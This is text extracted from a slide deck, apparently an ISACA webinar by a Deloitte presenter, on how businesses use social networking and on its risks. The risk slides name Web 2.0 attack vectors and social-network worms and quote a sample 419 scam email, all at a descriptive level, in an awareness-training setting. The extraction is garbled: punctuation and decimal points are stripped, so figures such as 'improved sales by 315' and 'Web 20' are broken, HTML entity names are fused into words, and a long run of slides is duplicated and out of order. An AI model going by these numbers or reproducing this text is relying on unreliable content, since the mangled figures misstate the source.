As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg9
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Short frequent posts with questions information or current status
bull Twitter (public) and Yammer (private) are two examplesbull Social software (including Facebook LinkedIn and
MySpace) now prompts for ldquowhatrsquos on your mindrdquo or similar status or mood lines
Microblogging
wwwisacaorg10
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Web sites which allow users to easily add remove edit and change most available content
bull Effective for collaborative writing and self-service Web site creation and maintenance
Wikis
wwwisacaorg11
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Wikipedia ndash perhaps the best known Wikindash Launched on 15 January 2000ndash First edit on 16 January followed by 1000 articles in the first
month ndash Now has 17 million articles in 270 languages all written by
volunteers ndash Billionth edit took place on 16 April 2010 ndash Used by 400 million people every month ndash Claims to have 80000 editors although reports suggest that it
has recently lost thousands something Wikipedia disputes ndash Aims to grow to one billion users by 2015 with a focus on
women and people in the developing world ndash Critics maintain that many entries are untrustworthyndash But a disputed study has shown that for subjects such as
science it comes as close as traditional encyclopedias
Statistics taken from httpwwwbbccouknewstechnology-12171977
Wikis (cont)
wwwisacaorg12
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull A range of tools which facilitate social networkingbull Personal Web pages including bios photos interests
audio and video links to friends messages from friends and personal networks
Social networking software
wwwisacaorg13
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Facebook ndash the biggest of them allndash Over 500 million registered users ndash 50 of our active users log on to Facebook in any given day ndash About 70 of Facebook users are outside the US ndash More than 30 billion pieces of content (web links news
stories blog posts notes photo albums etc) shared each month
ndash People spend over 700 billion minutes per month on Facebook
Statistics taken from httpwwwfacebookcompressinfophpstatistics (Sept 2010)
bull As of March 13 2010 Facebook was Americarsquos most popular site according to Experian Hitwise with 71 of traffic compared to Googlersquos 70
Social networking software (cont)
wwwisacaorg14
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Sites which allow users to share links to sites with othersbull Tags are metadata which classify content into categoriesbull Can be used to aid searches create tag clouds and link
disparate sources
Social bookmarking and tagging
wwwisacaorg15
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Using feeds available from a Web site to provide an updated list of its content in the form of a subscription an embedded portion of a Web site or a collection of disparate content on a particular topic
bull RSS (Really Simple Syndication) or Atom syndication and rss xml or rdf files used for the feeds
bull Mashups combine data and feeds from multiple sources to provide a single integrated set of information ldquoeg data plotted on a maprdquo
Syndication and mashups
wwwisacaorg16
Social network Social network mdashmdash More terminology (cont)More terminology (cont)
bull Online collections of videos and photos from usersbull Users can upload tag and rate contentVideos and
photos
wwwisacaorg17
Social Networking CompaniesSocial Networking Companies
Social Media Popular Examples
Wikis Wikitravel Wikipedia wikiHow WikiBooks the TV IV
Blogs livejournal WordPress Blogger Technorati xanga
Social Networking myspacecom LinkedIn facebook friendster plaxo
RSS(Really Simple Syndication)
newsgator Bloglines iGoogle FeedBurner
Presence and Microblogging
twitter Pownce jaiku Hictu tumblr
Social Bookmarkingand Tagging
delicious digg reddit newsvine StumbleUpon
Online Photo andVideo Sharing
YouTube flickr shutterfly last-fm slideshare
wwwisacaorg18
Why and how companies are Why and how companies are using social networkingusing social networking
wwwisacaorg19
Statistics on companies using Social Statistics on companies using Social NetworkingNetworking
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg20
Statistics on companies using Social Statistics on companies using Social Networking (cont)Networking (cont)
Data was collected between November 2009 and January 2010 among the Fortune Global 100 companies US = 29 companies Europe = 48 companies Asia-Pacific = 20 companies Latin America = 3 companies
Source httpwwwburson-marstellercomInnovation_and_insightsblogs_and_podcastsBM_BlogDocumentsBurson-Marsteller20201020Global20Social20Media20Check-up20white20paperpdf
wwwisacaorg21
Companies typically adopt Social Media for Companies typically adopt Social Media for three major benefitsthree major benefits
Increase employee productivityand operational efficiencies
Foster creativity innovationand collaboration
Enhance customer andpartner relationships
1
2
3
wwwisacaorg22
Increase employee productivity and Increase employee productivity and operational efficienciesoperational efficiencies
bull Creates a lightweight institutional memory system for a companyrsquos intellectual assets to be easily captured stored and accessed
bull Reduce the net volume of e-mail and allow users to ldquopullrdquo information at their convenience as opposed to spending time reading through mass e-mail chain
bull Create better quality deliverables faster by drawing on the collective talents knowledge and experiences of other employees around the world
Operational efficienciesbull A leading energy company realized approximately $250K in annual cost savings by
conducting its employee conference virtually using Social Media
Improved reportingbull A global investment bank tightened reporting cycle times from several
weeks to ldquoabout 30 secondsrdquo per stakeholder by enabling them to submit their information directly into a team wiki and making that information instantly available to others in a rich dashboard mashup
wwwisacaorg23
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull American Red Crossndash Designed to incite discussions around issues the American Red Cross cares
about and describe actions individuals can take (online or offline) to help people prevent prepare for and respond to emergencies and give valuable information about preventing preparing for and responding to emergencieshttpredcrosschatorg
wwwisacaorg24
Increase employee productivity and Increase employee productivity and operational efficiencies (cont)operational efficiencies (cont)
bull Deloittersquos DWikindash Provides a safe flexible knowledge creation and information sharing
environment for all Deloitte practitioners across country practice and Deloitte organizational borders
ndash Enhances the client service delivery capabilities of our Deloitte practitioners ndash Serves as a test environment for innovative concepts and solutions which
expand the business interests of Deloitte
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
